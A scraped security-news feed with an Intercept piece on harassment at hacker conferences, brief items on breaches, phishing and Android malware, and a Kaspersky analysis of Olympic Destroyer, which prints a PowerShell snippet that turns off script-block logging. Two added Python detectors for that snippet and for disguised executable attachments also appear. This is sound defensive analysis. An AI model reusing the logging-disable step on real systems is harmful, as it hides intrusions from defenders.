Others, however, are more skeptical about the possibility of a culture change. “There’s been no reckoning that I’ve seen,” said Gauthier. “I think there should be, and I think women are having those discussions, but that’s not where money is and not where power is.” Some women told The Intercept that they are not willing to risk yet another season of harassment to find out whether anything feels safer. As women seem to be attending these events in decreasing numbers, there is one matter in which they are all in agreement: Change is impossible so long as the men in charge don’t step up to address the issue head-on.


Hackers examine a voting machine during Def Con, a gathering of information security professionals, in Las Vegas on July 28, 2017.

Photo: Mark Ovaska/Redux

Def Con, the world’s largest and most famous hacker conference, started in 1993 as a goodbye party for a hacker network. It has since grown and professionalized, drawing crowds of close to 22,000 people to a Las Vegas hotel every August. Celebrated computer security experts mingle with NSA agents and civil liberties lawyers. Attendees register by paying $250 in cash at the door. There are around nine men for every woman in attendance. Other conferences, such as RSA and Black Hat, have a more corporate vibe, charging registration fees over $2,000.

Women describe an overall conference culture that promotes a “what happens in Vegas stays in Vegas” mentality, with after-parties where attendees are encouraged to drink as much as possible. They explained that there are often few networking alternatives to the alcohol-heavy after-parties.

Take Def Con’s Hacker Jeopardy in 2016. The late-night game went viral on Twitter after a cybersecurity expert posted about a request that contestants guess the size of a porn star’s penis to within half an inch. Women dressed in skimpy clothing served beers to an all-male group of contestants. In the Double Jeopardy round, they removed pieces of clothing each time a contestant got a question right. The next day, after conference organizers heard about online pushback, they changed the rules so that contestants who answered correctly could have the choice between sending a donation to the Electronic Frontier Foundation or continuing to call for a woman to undress. Progress, in other words, has felt incremental.


Founders of these four conferences include both black-hat hackers, who work outside the industry, and sometimes outside the law, to expose flaws on their own, and white-hat hackers, who work within governments and corporations. Over the years, when faced with complaints, some organizers have responded by describing their events as harmless fun. Jeff Moss, the founder of both Def Con and Black Hat, has defended Hacker Jeopardy by appealing to tradition and the distinction, in his eyes, between “sexy” and “sexism.”

After Gauthier, a veteran infosec worker, heard about Hacker Jeopardy, she spoke to one of the workers at the conference for over an hour. “The answer that I got was that it was anybody’s choice to attend or not to attend, and can’t I lighten up because it’s good fun?” she said. “People don’t understand that as industry evolves, this is a professional environment, and this is not inclusive behavior.”

These problems are self-reinforcing: So long as conferences celebrate and reflect the sexist status quo of cybersecurity, expanding the ranks of women in the field will be a problem. Some conferences are reported to still feature more “booth babes” than actual female attendees. One woman remembered attending a conference with so few women that when she walked into the ladies’ room, she needed to turn the lights on. Another recalled entering the bathroom and seeing only booth babes in miniskirts and go-go boots.

And yet for years, some organizers have kicked the problem down the road. Instead of organizing the conferences to reflect a positive vision of what the field could be, they’ve defended their choices to have all-male keynotes by arguing that such talks are just a reflection of the way things are. A statement that RSA organizers released about their 2018 “manel” reads: “A diverse speaking program starts with increasing diversity within the technology sector, which needs to be addressed by the industry as a whole.”

The stakes for more inclusive representation are high. Women are leaving the technology sector in greater numbers than they are entering it. Computer science is one of the fastest-growing fields in the United States, and yet, every year since 1984, the number of women in technology in the U.S. has decreased. Attrition is typical. Forty-one percent of women quit the tech industry mid-career compared with just 11 percent of men, according to the National Center for Women & Information Technology. The cybersecurity industry has been projected to have 1.8 million unfilled jobs worldwide by 2022. To address this shortage, companies will need to recruit and retain women, the Global Information Security Workforce study found.

That may be easier said than done. When conferences exclude women speakers, they send a “clear message” that women are still not welcome in the security field, wrote Access Now, a nonprofit focused on human rights, about the keynote roster for the RSA Conference USA 2018. “This is a message that will be heard not only by the attendees but by organizers of other conferences that look to RSA Conference as a source for guidance,” the letter reads. “The bigger danger is that we could see this message — and the mindset behind it — reflected in hiring, development, and operational decisions across the sector.”


Audience members at the RSA Conference at San Francisco’s Moscone Center, March 1, 2016.

Photo: Jim Wilson/The New York Times/Redux

The absence of women at conferences only strengthens the self-serving perception for the majority-masculine field that there is a “pipeline problem” — that the reason there is a gender deficit is because there are simply no talented women to hire. It ignores the fact that talented women have already been pushed away.

Many women say the problem begins as early as recruiting. Cybersecurity classes use masculine language — militaristic talk of enemies, penetration tests. Partly emerging from army and intelligence communities, hackers can be prone to hazing and competitive one-upmanship, according to Sarah Clarke, a security adviser. “It’s a culture of just being mean to new people and needing to ‘prove yourself,’” Clarke said.

Rebecca Long, a software engineer and diversity advocate, says that it’s not a stretch to see a connection between the goals of hacking and its particular culture of harassment. “The whole idea of hacking is compromising someone’s system and having power and control over someone else’s computer or network,” she said. Some women have recommended that the field might seem more welcoming if it moved away from the adversarial language of warfare and instead, framed its goals as a matter of safety.

Women told The Intercept that the tacit norms of the industry can make it seem as though harassment is a problem of female sensitivities, rather than male behavior. The unspoken rule is that women must learn to shrug it off and accommodate themselves to inappropriate actions.

Many women interviewed said that the accumulation of minor incidents over the years leads to their dissatisfaction with — or departure from — the field. They recalled stories of inappropriate touching, lewd remarks, and business meetings leading to sexual propositions. Nearly every woman interviewed said that, at some point, they had been mistaken for a male conference-goer’s girlfriend, even if they were one of the keynote speakers. When not being singled out for sexual attention, they were ignored, dismissed, or asked where their boss was. Like many of the women who spoke to The Intercept, infosec researcher Sarah Lewis said it was not a single experience, but the buildup of small brush-offs that drove her away from industry conferences where she wasn’t being paid to speak. “Numerous times, I’ve been asked if the food is coming out. At conferences I’ve keynoted at, I’ve been asked if I was one of the student groups there. Most of the sexism I tend to see is people who mean well, but who have an assumption that I don’t have experience and I don’t belong,” she said.

“There are a lot of cases of overt hostility,” said Amie Stepanovich, who manages cybersecurity policy at Access Now. “I think what is more insidious sometimes are the less overt cases: These are conference sessions where there are people of color or women represented, but they aren’t asked many questions. Or audience questions are only accepted from men. It’s not always overt examples that drive people away. Oftentimes, it’s little things that send the message that people aren’t welcome.”


Many women don’t have the privilege of being able to choose whether to leave their jobs if and when harassment occurs. But when it comes to voluntary conferences, it’s not surprising that after years of experiencing such incidents, women have simply stopped showing up. Many told The Intercept that there were certain conferences they would never consider attending again because of their experiences there.

Yet while not showing up may be the safest and most sensible option for one’s personal well-being, it can put women at a disadvantage professionally. As the programmer and feminist activist Valerie Aurora has written, “When you say, ‘Women shouldn’t go to DEFCON if they don’t like it,’ you are saying that women shouldn’t have all of the opportunities that come with attending DEFCON: jobs, education, networking, book contracts, speaking opportunities — or else should be willing to undergo sexual harassment and assault to get access to them.”

In 2011, on the second night of Def Con, Emily Maxima, a programmer, and her wife, who does not work in infosec, were inside the Caesars Palace Hotel waiting for a DJ set, when a Def Con security guard — typically male and known as a “goon” in conference slang — asked them how their “bribe card” was going. Bribe cards are played like bingo: Attendees perform scavenger hunt favors for the goons in exchange for prizes. “I only had one hole punched in mine,” Maxima wrote on her blog years later. The goon turned to her and said: “‘We could punch ‘boobs’ for you.’ One of these volunteer security guards had literally just solicited to see my wife’s breasts right in front of me in exchange for a hole in my bribe card.” Maxima has not returned to Def Con since.


The Grace Hopper Celebration, a long-running conference named for a pioneering programmer, on Oct. 5, 2013.

Photo: AnitaB.org/Flickr

Women working across all sectors of technology have been fighting back against the field’s entrenched gender bias. In 2014, along with a few other female cybersecurity experts, Chenxi Wang started a social media campaign to ban booth babes. One year later, RSA instituted a dress code in response. Wang said it was a small victory: “They took a step in a positive direction, so we don’t see overt sexualized displays. Even though you still see the occasional booth babes, the overall tone of the show floor has become a lot more professional.”

In response to the booth babe ban, Deidre Diamond, a veteran technologist, was inspired to start a company called Brainbabe, which tackles sexism and the skills shortage in the industry at the same time by providing vendors with students from diverse backgrounds to work at booths.

Women in tech have their own gatherings — from the Grace Hopper Celebration, a long-running conference named for a pioneering programmer that draws around 18,000 people a year, 90 percent of them women, to Our Security Advocates Conference, or OURSA, founded this April in response to RSA’s sexist lineup. In 2016, women began to organize a special event known as TiaraCon, separate from Def Con’s main show, for networking, lock-picking (a popular conference extracurricular), and resume-writing. Year-round, groups like the Diana Initiative, Future Ada, and the Ada Initiative provide support for women in tech.

Leigh Honeywell, CEO of the anti-harassment technology startup Tall Poppy, has hosted a workshop in a Caesars Palace room apart from Def Con for the last four years known as “Ally Skills,” which teaches attendees how they can work to improve diversity in security. “There are folks in the field who do want to see it become a more hospitable place for underrepresented people, and I feel fortunate to be able to share tools and tactics for making that happen,” Honeywell explained in an email. The open source workshop, which was originally created by the Ada Initiative, teaches attendees the tools to call out misogyny and bias. Slides ask attendees to brainstorm how allies might respond to situations such as: “A woman you don’t know is standing near your all-male group at a conference in your field. The conference attendees are more than 90 percent men. She is alone and looks like she would rather be talking to people.”

But some women say that separate events, while valuable, do not force the main conference organizers to directly address gender bias. In fact, some say that such events reinforce the message that harassment is a problem for women to deal with on their own. Events that are separate cannot, by their very nature, be equal, Irwin said. While she is glad to have a focus on diversity, she said, “I don’t want the ‘girls’ version.’ I want the big stuff we do for everybody to already have diversity in it.”


Several women emphasized that until conference management puts the kind of allyship promoted by Honeywell and others at the center of their programming, it will be difficult to effect change. Men need to step up too, Diamond argued: “I tell men this all the time: They’re the ones who are going to solve the problem. There are nearly 90 percent of them. What I want to see is men calling out other men.”

One of the most successful and effective initiatives undertaken to change conference culture has been the development and implementation of written policies that explicitly ban harassment. As the Ada Initiative explains, the most effective policies publicly specify what kinds of behaviors are not acceptable, establish a reporting procedure with contact information for violations, and document how the staff will respond to reports.

In the last several years, responding in part to the organizing work of feminist technologists like those at the Ada Initiative, Def Con, RSA, and Black Hat have each instituted clear codes of conduct that prohibit harassment and reserve the right to expel and banish attendees engaging in unacceptable behavior. The latter two have the most detailed of the four conferences’ policies, spelling out the nature and scope of harassment prohibited.


Internet activist Jacob Appelbaum gives a keynote address at the re:publica conference in Berlin on May 6, 2014.

Photo: Britta Pedersen/picture-alliance/dpa/AP

Last year, Def Con became the first hacker con to provide a transparency report of incidents, which it posted online this month. According to the report, at the 2017 event, there were “7 harassment events,” including two people “banned for life for harassing women.” The report also noted that Appelbaum and Marquis-Boire were banned. (Even in its transparency report, the conference kept things a little tongue-in-cheek, noting that there were also “3 adorable dog reports.”)

Experts on anti-harassment policies say that the policies are still insufficient: They do not specify channels for anonymous reporting of incidents, give a deadline for how quickly the conference will respond to reports, or explain what happens if someone in the group charged with enforcement is accused of harassment.

It is also not clear whether the enforcement mechanisms in these codes of conduct prioritize the safety of those who have experienced abuse. “It’s been my personal experience that event staff are simply not equipped or qualified to be first responders on these issues,” explained Melanie Ensign, a press lead for Def Con and director of security at Uber, in an email. Outside of her official capacity at the conference, she has been working with experts in the community to expand resources available to survivors of assault.

Black Hat general manager Steve Wylie told The Intercept that the conference’s policy was developed in 2014 and continues to be a “live document.”

“Clearly our industry has some issues, and we’ve developed programs to highlight the issue,” Wylie said. The conference has been attempting to recruit and encourage more women to apply to speak; new diversity initiatives include partnerships with Queercon, a scholarship program for women, peer-to-peer mentoring, and a series of presentations that address human (rather than technical) issues.

RSA declined to respond to detailed questions for this story and sent a link to a blog post addressing this year’s controversy regarding speaker diversity. Def Con, which has not updated its code of conduct since 2015, wrote in an emailed statement: “We are committed to being proactive rather than reactive in the areas of representation and safety. This includes being available to hear all concerns, making it easy for attendees to share those concerns, and having a clearly defined, ongoing process for addressing those concerns. We’ve invested in a reorganization of our volunteer staff, new training, and the creation of an independent department for reporting incidents. … We will continue to do what hackers do — make changes, see what gets better, and iterate on the results.” For this year’s conference, the statement said, Def Con will be introducing a dedicated crisis support line that attendees could access by phone, text, or chat.

Jessy Irwin of Tendermint often feels surprise that in an industry that prides itself on finding patterns and addressing vulnerabilities, the response to decades of harassment has been slow-going. “How the hell can we claim to be good at our jobs at work when we can’t get any of the people in our communities to follow our best practices of knowledge?” she asked. “I want to see the response process get better. I don’t know how we can call ourselves experts at security if we can solve problems with code, but we can’t do it when it comes to people.”

The post Can #MeToo Change the Toxic Culture of Sexism and Harassment at Cybersecurity Conferences? appeared first on The Intercept.

CarePartners Face Data Breach Following Another Cyber Attack On Healthcare

Cyber attacks and data breaches on health care services continue this week whereby a Canadian healthcare services company CarePartners faced

CarePartners Face Data Breach Following Another Cyber Attack On Healthcare on Latest Hacking News.

Pupils Aren’t Taking ICT And The Digital Skills Gap Is Widening

A new report was released from the University of Roehampton today, which looks at how many pupils achieved GCSE and A-level computing qualifications in 2017. The report shines a light on the digital skills gap. Key stats include that just 12% of UK students choose to take ICT at GCSE, and just 20% of those who do take the subject are girls. Trish Burridge, Director of Consulting Services EMEA at Skillsoft commented below.

Trish Burridge, Director of Consulting Services EMEA at Skillsoft:

“Not only are these worrying statistics for the tech industry, but the corporate landscape as a whole.  Every industry in some way has been disrupted by technology.  Businesses want employees with the digital skills needed to meet the demands of the modern workplace.

Organisations are increasingly turning to training programmes to upskill their current employees.  If young women do not have a strong digital skills base when entering the workforce, they will undoubtedly be at a disadvantage against other candidates that do.”

The post Pupils Aren’t Taking ICT And The Digital Skills Gap Is Widening appeared first on Information Security Buzz.

Panda Security Sweden: A Great Place to Work

The Great Place to Work Institution has ranked Panda Security Sweden 6th on the 2018 version of its annual list of the best workplaces in Sweden.

Great Place to Work is a global authority on workplace culture, and annually makes the world’s largest and most respected study of workplace excellence. Its rigorous, objective methodology sets the standard for defining great workplaces all around the world. Their studies provide an unparalleled insight into workplace culture, and go beyond just rankings and lists to provide practical knowledge and tools to transform workplaces.

Other companies considered “Great Places to Work” include Salesforce, EY, and Adobe.

Panda Security Sweden began the process to be included on the list of Swedish companies in December 2016. In the first half of 2017, the company worked in teams to define the areas where their work culture stands out and goes beyond simple hygiene factors such as salary and policies:

  • Recruitment, Welcoming, and Onboarding
  • Inspiration
  • Informing
  • Listening, Problem Solving, and Involving
  • Appreciation
  • Development
  • Caring, Balance, and Support
  • Celebration
  • Sharing and CSR

The Great Place to Work Institution then carried out an audit in order to assess the company in these areas. The work on providing information was led by Julia Hallström (Finance Manager), with the support of Karin Angerind (Marketing and Sales Process Manager).

The next step was a survey which is sent out to all companies in the running for the award. Its 64 questions must be answered individually by each employee to see how well aligned they are with what is described in the audit. The twenty employees of Panda Sweden completed this survey in September.

One month after completing the audit and the survey, Panda Sweden received the news that they had been awarded the Great Place to Work certification, which automatically qualified the company for inclusion in the Swedish competition.

Some of the factors that made Panda Sweden stand out were its friendly atmosphere and caring environment, its opportunities for individual development, and the employee pride of the work and the company.

One of the team members in Sweden commented that “We have a great atmosphere with nice colleagues and supporting managers. I am proud of our products and our office, and I am happy to recommend it to others.”

When the result was announced, Patrik Kocon, Country Manager for Sweden, Finland, and Denmark congratulated the team in a post on LinkedIn:

“Sometimes it is hard to describe the pride you feel of the team you are part of! This is one of those moments. Thank you all fantastic co-workers for making our office a joy to come to, instead of a must! I am happy this now reaches everyone since we just got awarded the Great Place to Work certification!”

At the Swedish awards ceremony held in March 2018, Panda Security Sweden was ranked 6th out of the 60 companies in the category of companies with fewer than 50 employees. In the whole country, there are over 1 million companies of this size.

On June 14, 2018, at the annual European event in Athens, the results for the Great Place to Work awards for the whole of Europe were announced. Over 2,800 organizations with more than 1.6 million employees were competing. Panda Security Sweden was ranked as the 13th best workplace in Europe (in the category of fewer than 50 employees).

The post Panda Security Sweden: A Great Place to Work appeared first on Panda Security Mediacenter.

Phishing Campaigns Target Sports Fans, Consumers

Two phishing campaigns have been targeting consumers of both the FIFA World Cup and one of its longtime partners, Adidas. One campaign attempts to lure victims into clicking on a malicious link under the guise of downloading a World Cup schedule of fixtures and a result tracker, while the second promises a “free” $50-per-month subscription for Adidas shoes. Today Check Point announced that it has discovered a new phishing campaign linked to the start of the World Cup that targets soccer fans. The attachment carries DownloaderGuide, a known malware family that is often used to install potentially unwanted programs (PUPs) such as toolbars, adware and system optimizers. Researchers discovered nine different executable files delivered in emails with the subject: “World_Cup_2018_Schedule_and_Scoresheet_V1.86_CB-DL-Manager.”
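The lure described above works because a Windows executable is delivered where the recipient expects a schedule document. The following is an added example, not code from Check Point or Infosecurity Magazine, of a mail-gateway check that inspects attachments by content rather than by declared type: it flags the PE `MZ` magic, an executable extension, and a misleading double extension such as `.pdf.exe`. Both messages are constructed here for the example; only the subject line is taken from the report, and the sender and recipient addresses, the attachment bytes and the extension lists are assumptions.

```python
"""Flag emails whose attachment is a Windows executable dressed up as a document.

Added example for the World Cup phishing campaign described above; it is not
Check Point's or Infosecurity Magazine's code. The two messages are constructed
here for the example, and only the subject line comes from the report.
"""
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows will execute on double-click (assumed list, not exhaustive).
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta"}
# Extensions a lure borrows to look like a harmless document (assumed list).
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}


def build_lure_message() -> bytes:
    """Constructed sample: executable stub named like a PDF, subject from the report."""
    msg = EmailMessage()
    msg["From"] = "fixtures@example.invalid"
    msg["To"] = "fan@example.invalid"
    msg["Subject"] = "World_Cup_2018_Schedule_and_Scoresheet_V1.86_CB-DL-Manager"
    msg.set_content("Your World Cup 2018 schedule and result tracker is attached.")
    # A PE file starts with the DOS header magic 'MZ'; this stub is not a real binary.
    stub = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
    msg.add_attachment(stub, maintype="application", subtype="octet-stream",
                       filename="World_Cup_2018_Schedule.pdf.exe")
    return bytes(msg)


def build_benign_message() -> bytes:
    """Constructed control: a PDF attachment that must not be flagged."""
    msg = EmailMessage()
    msg["From"] = "fixtures@example.invalid"
    msg["To"] = "fan@example.invalid"
    msg["Subject"] = "World Cup 2018 schedule"
    msg.set_content("Schedule attached.")
    msg.add_attachment(b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n", maintype="application",
                       subtype="pdf", filename="World_Cup_2018_Schedule.pdf")
    return bytes(msg)


def extensions(filename: str) -> list[str]:
    """All dotted suffixes, lower-cased: 'a.pdf.exe' -> ['.pdf', '.exe']."""
    parts = filename.lower().split(".")
    return ["." + p for p in parts[1:]]


def analyze(raw: bytes) -> list[dict]:
    """Return one finding per suspicious attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        exts = extensions(name)
        reasons = []
        # Content check first: the declared MIME type and the name can lie, the bytes cannot.
        if data[:2] == b"MZ":
            reasons.append("pe_magic")
        if exts and exts[-1] in EXEC_EXT:
            reasons.append("executable_extension")
        if len(exts) >= 2 and exts[-2] in DOC_EXT and exts[-1] in EXEC_EXT:
            reasons.append("double_extension")
        if reasons:
            findings.append({"subject": str(msg["Subject"]), "filename": name,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for raw in (build_lure_message(), build_benign_message()):
        print(analyze(raw))
```

The magic-byte check is the one that matters: renaming the file or changing its declared MIME type defeats the extension rules, but not the `MZ` test. In a real gateway the same loop would run over messages read from disk or a mail queue instead of the constructed samples.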

ORIGINAL SOURCE: Infosecurity Magazine

The post Phishing Campaigns Target Sports Fans, Consumers appeared first on IT SECURITY GURU.

Attorney-General’s Department caught up in PageUp breach

The Australian Attorney-General’s Department (AGD) has confirmed that some of its staff may have had their information compromised at the hands of HR software provider PageUp, after the company earlier this week admitted some data held on its clients may be at risk. As first reported by SBS News, AGD’s recruitment team sent an email to job applicants informing them it was “possible that some of your personal details which were held in PageUp’s systems may have been accessed by an unauthorised person and possibly disclosed to others”.

ORIGINAL SOURCE: ZDNet

The post Attorney-General’s Department caught up in PageUp breach appeared first on IT SECURITY GURU.

Not so private eye: Got an Axis network cam? You’ll need to patch it, unless you like hackers

Researchers have detailed a string of vulnerabilities that, when exploited in combination, would allow hundreds of models of internet-connected surveillance cameras to be remotely hijacked. Security firm VDOO said today it privately alerted camera maker Axis Communications to the seven bugs it found in its devices, leading the manufacturer to issue firmware updates for roughly 400 models of connected surveillance cameras that would otherwise be vulnerable to attack. Owners of at-risk gear are advised to update their camera firmware as soon as possible.

ORIGINAL SOURCE: The Register

The post Not so private eye: Got an Axis network cam? You’ll need to patch it, unless you like hackers appeared first on IT SECURITY GURU.

This sneaky Windows malware delivers adware – and takes screenshots of your desktop

A newly uncovered form of stealthy and persistent malware is distributing adware to victims across the world while also allowing attackers to take screenshots of infected machines’ desktops. Discovered by researchers at Bitdefender, the malware has been named Zacinlo after the name of the final payload that’s delivered by the campaign which first appeared in 2012. The vast majority of Zacinlo victims are in the US, with 90 percent of those infected running Microsoft Windows 10.

ORIGINAL SOURCE: ZDNet

The post This sneaky Windows malware delivers adware – and takes screenshots of your desktop appeared first on IT SECURITY GURU.

75% of Malware Uploaded on “No-Distribute” Scanners Is Unknown to Researchers

Three-quarters of malware samples uploaded to “no-distribute scanners” are never shared on “multiscanners” like VirusTotal, and hence, they remain unknown to security firms and researchers for longer periods of time. Although some antivirus products will eventually detect this malware at runtime or at one point or another later in time, this leaves a gap in terms of operational insight for security firms hunting down up-and-coming malware campaigns.

ORIGINAL SOURCE: Bleeping Computer

The post 75% of Malware Uploaded on “No-Distribute” Scanners Is Unknown to Researchers appeared first on IT SECURITY GURU.

MysteryBot Malware Package of Banking Trojan, Ransomware, and Keylogger

Security researchers at ThreatFabric have found a new type of Android malware called MysteryBot. It combines a banking trojan, a keylogger and ransomware in one package, making it one of the most destructive Android malware families seen recently.

When it was first found, MysteryBot was thought to be an updated version of LokiBot, a banking trojan that wreaked havoc last year by turning into ransomware whenever someone tried to remove it from their device. MysteryBot, however, carries more threats than LokiBot.

According to the researchers, the two malware families are quite similar and are currently run from the same command-and-control server. The striking difference is that MysteryBot is able to take control of the user's phone.

A ThreatFabric spokesperson said: "Based on our analysis of the code of both Trojans, we believe that there is indeed a link between the creator(s) of LokiBot and MysteryBot. This is justified by the fact that MysteryBot is clearly based on the LokiBot bot code”.

MysteryBot's commands can steal contacts, emails and messages, remotely start apps installed on the device, manipulate banking apps and log keystrokes. Its main targets are users running Android 7.0 and Android 8.0.

"The encryption process puts each file in an individual ZIP archive that is password protected, the password is the same for all ZIP archives and is generated during runtime. When the encryption process is completed, the user is greeted with a dialog accusing the victim of having watched pornographic material," said ThreatFabric researchers in a blog post. “Most Android banking Trojans seem to be distributed via smishing/phishing & side-loading,” they added.

MysteryBot is still under development and is not yet widespread. Users are nonetheless advised not to install Android apps from any source other than the Google Play Store.

Um, excuse me. Do you have clearance to patch that MRI scanner?

Healthcare regulations working against cybersecurity, claims expert

Israel Cyber Week: Healthcare regulations oblige medical equipment vendors to focus on developing the next generation of technologies rather than on fixing current cybersecurity issues, according to experts presenting at the eighth Israel Cyber Week.…

French authorities take down ‘Black Hand’ dark web forum selling narcotics, weapons, stolen banking data

The French Minister of Public Action has announced the dismantling of the “Black Hand” forum, a marketplace on the French dark web selling drugs, weapons, stolen credit cards and other illicit goods and services.

On June 12, the National Directorate of Intelligence and Customs Investigations (DNRED) reportedly started raiding key locations in the country where authorities believed they might find the forum’s operators.

Authorities arrested the site’s administrator and several others also seemingly tied to the illegal marketplace. Investigators seized the actual server on which the forum was hosted as well as additional computer equipment, fake identification documents, 4,000 euros in cash and another 25,000 euros in digital currency (i.e. Bitcoin).

After gaining access to the forum’s contents, investigators confirmed that more than 3,000 registered users were selling or buying illegal products and services, including weapons, narcotics, false papers and stolen banking data, through the service.

After 48 hours of custody, the suspects were brought before the magistrates of the Interregional Specialized Court of Lille, where they were charged as follows:

“Criminal conspiracy for the preparation of crime (putting into circulation counterfeit or falsified currency legal tender in France), offenses punishable by 10 years imprisonment (drug trafficking) and offenses punishable by five years’ imprisonment (false administrative documents, scams).”

According to the press release issued by the Ministry of Public Action on Saturday, “this is the end of one of the most important illegal market places for the French dark web.”

Securelist – Kaspersky Lab’s cyberthreat research and reports: Olympic Destroyer is still alive

In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.

We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis

In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated, with randomly generated variable and function names.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables PowerShell script block logging (and script block invocation logging) to avoid leaving traces:

IF(${GPc}[ScriptBlockLogging])
{
	${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
	${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
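A detection the responder side wants at this point: the block that switches logging off is itself recorded as a PowerShell 4104 (script block) event when it is invoked, assuming script block logging was on before the macro ran, so the bypass is something you can hunt for even though nothing useful follows it. The Python below is an added example, not code from the Kaspersky report; it scans constructed 4104 ScriptBlockText samples for the assignment shown above, tolerating the case randomization and the ${name}, $name and quoted-key spellings Invoke-Obfuscation produces. The `cachedGroupPolicySettings` sibling pattern is an assumption drawn from public variants of this bypass, not something the page states.

```python
import re
from dataclasses import dataclass

# Added example, not from the Kaspersky report: flag PowerShell 4104 events whose
# ScriptBlockText contains the logging-disable assignment shown above. The regex
# allows random casing and the ${name} / $name / quoted-key spellings the obfuscator emits.
BYPASS_RE = re.compile(
    r"\[\s*['\"]?ScriptBlockLogging['\"]?\s*\]\s*"
    r"\[\s*['\"]?EnableScriptBlock(?:Invocation)?Logging['\"]?\s*\]\s*=\s*0\b",
    re.IGNORECASE,
)
# Assumption (not stated on the page): most public variants of this bypass reach the
# engine's in-memory policy cache through a field of this name, so it is a useful sibling hit.
CACHE_RE = re.compile(r"cachedGroupPolicySettings", re.IGNORECASE)


@dataclass
class Event4104:
    """Minimal stand-in for a Microsoft-Windows-PowerShell/Operational 4104 record."""
    record_id: int
    script_block_text: str


def find_logging_bypass(events):
    """Return [(record_id, reason)] for events that try to switch script block logging off."""
    findings = []
    for ev in events:
        text = ev.script_block_text
        if BYPASS_RE.search(text):
            findings.append((ev.record_id, "EnableScriptBlockLogging set to 0"))
        elif CACHE_RE.search(text):
            findings.append((ev.record_id, "cachedGroupPolicySettings referenced"))
    return findings


# Constructed sample events. Record 1 is the snippet from the page; 3 is a hand-written
# variant using quoted keys and spaces; 2 and 4 are benign and must not fire.
SAMPLE_EVENTS = [
    Event4104(1, "IF(${GPc}[ScriptBlockLogging]){${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;"
                 "${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0}"),
    Event4104(2, "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB"),
    Event4104(3, "$gpc['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0"),
    Event4104(4, "Write-Host 'EnableScriptBlockLogging is a registry value name'"),
]

if __name__ == "__main__":
    for rid, why in find_logging_bypass(SAMPLE_EVENTS):
        print(f"EventRecordID {rid}: {why}")
```

The regex only catches key names written out as literals; an obfuscator that assembles `ScriptBlockLogging` from string fragments or a format operator will slip past it, which is why a broader rule on any write to a `ScriptBlockLogging` key, or on the cache field name, is worth running beside it.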

It has an inline implementation of RC4 in PowerShell, which is used to decrypt an additional payload downloaded from Microsoft OneDrive. The key is a hardcoded 32-byte string of ASCII hexadecimal characters (the bytes of the characters themselves, not the 16 bytes they would decode to). The first four bytes of the downloaded blob are treated as an IV and prepended to that key before the key schedule runs; the remainder is the ciphertext. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in PowerShell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

